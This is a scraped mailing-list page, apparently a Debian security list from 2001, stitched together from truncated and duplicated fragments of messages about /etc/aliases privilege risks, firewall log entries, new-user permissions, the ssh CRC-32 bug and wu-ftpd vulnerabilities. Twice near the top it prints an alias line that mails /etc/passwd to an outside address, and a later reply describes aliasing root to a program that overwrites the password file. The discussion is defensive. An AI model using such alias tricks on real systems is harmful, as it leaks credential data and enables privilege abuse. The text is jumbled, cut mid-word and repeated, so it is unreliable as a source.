hi joshua...
/etc/aliases... what can we do with it...
i dont know if this was bill's original intent or not
but lets see what can (regular) people do with /etc/aliases
/etc/aliases
badthing: mail -s "send me the passwd" [EMAIL PROTECTED] \
< /etc/passwd
hi joshua...
/etc/aliases... what can we do with it...
i dont know if this was bill's original intent or not
but lets see what can (regular) people do with /etc/aliases
/etc/aliases
badthing: mail -s "send me the passwd" [EMAIL PROTECTED] \
< /etc/passw
How are you creating a new user directory? are you mkdir'ing directly or
using a program like useradd? If you are mkdir'ing, change your umask (be
aware, this changes the umask of ALL of your newly created files. If
you are using useradd, look into the -D option. If you are using some
other method,
Petre Daniel <[EMAIL PROTECTED]> writes:
> Heya,i got those lines often lately..Can anyone explain me every little
> part of it? If you can drop an url link too,it would be great.. Thank
> you.
>
> Nov 30 16:16:28 brutus-gw kernel: Packet log: input DENY eth1 PROTO=6
> 210.86.20.213:1621 194.102.
Hi all,
Howto modify permission when create a new user, I
do not want to change the permissions all time that to
add a new user.
Default Permission
drwxr-sr-x2 teste2 teste2 teste2
best security permission
drwx--2 testeteste teste
Thanks,
Ricardson
___
Heya,i got those lines often lately..Can anyone explain me every
little part of it?
If you can drop an url link too,it would be great..
Thank you.
Nov 30 16:16:28 brutus-gw kernel: Packet log: input DENY eth1 PROTO=6
210.86.20.213:1621
194.102.92.21:6000 L=48 S=0x00 I=52039 F=0x4000 T=102 SYN (#1
Hello, just to be sure about this. Sorry to beat a dead horse, but
has the infamous CRC-32 compensation bug been fixed in the ssh package in
sid? I am being bugged about "Debian being vulnerable" to this attack, and
I would like to know for sure. Of course, tools like nessus just check
daem
How are you creating a new user directory? are you mkdir'ing directly or
using a program like useradd? If you are mkdir'ing, change your umask (be
aware, this changes the umask of ALL of your newly created files. If
you are using useradd, look into the -D option. If you are using some
other method
Petre Daniel <[EMAIL PROTECTED]> writes:
> Heya,i got those lines often lately..Can anyone explain me every little
> part of it? If you can drop an url link too,it would be great.. Thank
> you.
>
> Nov 30 16:16:28 brutus-gw kernel: Packet log: input DENY eth1 PROTO=6
> 210.86.20.213:1621 194.102
Hi all,
Howto modify permission when create a new user, I
do not want to change the permissions all time that to
add a new user.
Default Permission
drwxr-sr-x2 teste2 teste2 teste2
best security permission
drwx--2 testeteste teste
Thanks,
Ricardson
__
Heya,i got those lines often lately..Can anyone explain me every
little part of it?
If you can drop an url link too,it would be great..
Thank you.
Nov 30 16:16:28 brutus-gw kernel: Packet log: input DENY eth1 PROTO=6
210.86.20.213:1621
194.102.92.21:6000 L=48 S=0x00 I=52039 F=0x4000 T=102 SYN (#
Hello, just to be sure about this. Sorry to beat a dead horse, but
has the infamous CRC-32 compensation bug been fixed in the ssh package in
sid? I am being bugged about "Debian being vulnerable" to this attack, and
I would like to know for sure. Of course, tools like nessus just check
dae
That is a fair point but addressable with post-editing checks
in the wrapper. Of course, one is exceedingly vulnerable to
race conditions if one is not very careful about what is read and
when.
You don't have to use vi; there are dumber editors in the world.
Maybe you should just have some progra
hi,
maybe i misunderstand the intention here, but isn't it pointless to
restrict privileges of the editing process of /etc/aliases if you could
just as well change root's alias to a program that's run whenever root
receives email and, e. g., puts one's most favourite /etc/passwd in
place of the or
Hello,
I don't put the original message in the body but that guy just took my
identity !! The original spam seems to come from Germany and I don't
have any aol account !!
Florent
On 30/11/01, David Ehle wrote:
> Is the wu-ftpd in testing secure? It seems to be 2.6.1 a stinker.
Not so far. But calling a software where the source and the fix are
available, so that you can build a fixed version on your own is
inappropriate. Especially if you are using Win98 and Netscape, both
That is a fair point but addressable with post-editing checks
in the wrapper. Of course, one is exceedingly vulnerable to
race conditions if one is not very careful about what is read and
when.
You don't have to use vi; there are dumber editors in the world.
Maybe you should just have some progr
hi,
maybe i misunderstand the intention here, but isn't it pointless to
restrict privileges of the editing process of /etc/aliases if you could
just as well change root's alias to a program that's run whenever root
receives email and, e. g., puts one's most favourite /etc/passwd in
place of the o
Hello,
I don't put the original message in the body but that guy just took my
identity !! The original spam seems to come from Germany and I don't
have any aol account !!
Florent
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTE
On 30/11/01, David Ehle wrote:
> Is the wu-ftpd in testing secure? It seems to be 2.6.1 a stinker.
Not so far. But calling a software where the source and the fix are
available, so that you can build a fixed version on your own is
inappropriate. Especially if you are using Win98 and Netscape, bot
Thanks Curtis,
I know the maintainer has put together a fixed version for
Potato/stable, I am wondering if he has had time to do the testing yet,
or if we rollback to the testing one or what. I'm just hoping that
rollback won't be a dependency nightmare... the stable version is
wu-ftpd_2.6.0-6
The article I read about it on the Register...
http://www.theregister.co.uk/content/4/23082.html
"The hole affects thousands of users of virtually
every Linux release.
Because of the wide implications, Core, working with
CERT, and, at
on
Hello all,
Is the wu-ftpd in testing secure? It seems to be 2.6.1 a stinker.
Testing is using 2.6.1-5, is that also compromised? I have been
watching it all day but haven't seen any updates.
If it is not secure has a patched version been made available anywhere?
I can't seem to find any mention
23 matches
Mail list logo